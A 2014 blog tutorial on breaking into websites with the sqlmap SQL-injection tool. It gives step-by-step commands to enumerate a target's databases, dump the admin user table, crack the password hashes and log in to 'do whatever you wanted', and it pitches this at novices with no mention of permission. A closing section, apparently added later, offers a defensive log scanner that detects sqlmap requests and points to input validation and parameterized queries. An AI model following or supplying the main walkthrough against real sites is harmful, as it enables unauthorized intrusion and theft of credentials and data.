Tuesday, April 29, 2014

HACKING WEBSITE (SQLi) USING SQLMAP

Today I will introduce you to a very simple tool which will ease your SQL injection procedure. With the help of this tool, even a noob can hack a website.

About Sqlmap:
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

To use this you need to download and install Python.

Installing and setting the path for Python:
Step 1: Download Python from www.python.org (download Python 2.7).
Step 2: Unzip it and install it on your computer.
Step 3: Go to Control Panel --> go to System --> click on Edit the system environment variables.


Step 4: Then follow the steps given in the pic. Edit the environment variable as C:\python27;

Step 5: Click OK and restart your laptop.

Sqlmap:
Step 6: Download sqlmap from www.sqlmap.org.

Step 7: Unzip it and save it in your desired folder (I have saved it in C:).

Step 8: Open cmd by pressing Windows + R, then typing cmd and hitting Enter.

Step 9: Go to the folder where sqlmap is stored.
C:\> cd sqlmap

Step 10: Run sqlmap and use it. Find a vulnerable URL (how to find one will be discussed in another post; here, let the vulnerable URL be www.vulnesite.php?id=23).
C:\sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23"

Step 11: Then find the databases of the website.
C:\sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dbs

Step 12: Then find the tables and then the columns. (Let the database found be admin.)
C:\sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --tables -D admin
(Let the table found be admin.)

C:\sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --columns -D admin -T user

Step 13: Get all the data from the table.
C:\sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dump -D admin -T user

Step 14: You get the username and password. Now you can find the admin login page and type in the username and the password (if it is stored as an MD5 hash, you need to decode it using one of the various websites for that). Now log in and do whatever you wanted to do.
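
Seen from the defending side, the sqlmap runs in the steps above leave traces in the web server's access log. The following added example (not part of the original post) scans combined-format log lines for sqlmap's default User-Agent and for non-numeric values in a parameter that should only ever hold an integer, like id=23 here; the log lines, IP addresses and the /item.php path are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SQLMAP_UA = re.compile(r"\bsqlmap/", re.IGNORECASE)  # prefix of sqlmap's default User-Agent

# Constructed sample lines (documentation IP ranges, hypothetical /item.php endpoint).
SAMPLE_LOG = """\
198.51.100.7 - - [29/Apr/2014:10:00:01 +0000] "GET /item.php?id=23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [29/Apr/2014:10:00:05 +0000] "GET /item.php?id=23 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [29/Apr/2014:10:00:06 +0000] "GET /item.php?id=23%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.44 - - [29/Apr/2014:10:02:11 +0000] "GET /item.php?id=23%27 HTTP/1.1" 500 87 "-" "Mozilla/5.0"
"""

def scan(log_text, numeric_params=("id",)):
    """Return {client_ip: sorted list of reasons} for suspicious requests."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        if SQLMAP_UA.search(m["ua"]):
            findings[m["ip"]].add("sqlmap-user-agent")
        # parse_qs URL-decodes values, so %27 is seen as a quote character
        params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
        for name in numeric_params:
            for value in params.get(name, []):
                # an integer parameter must consist of ASCII digits only
                if not re.fullmatch(r"[0-9]+", value):
                    findings[m["ip"]].add(f"non-numeric-{name}")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The User-Agent is trivially changed, so treat that match as a weak signal. The digits-only check mirrors the server-side validation that, together with parameterized queries, stops the injection in the first place.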


For any query feel free to contact us @ prashantsavior@gmail.com and don't forget to like us on Facebook.


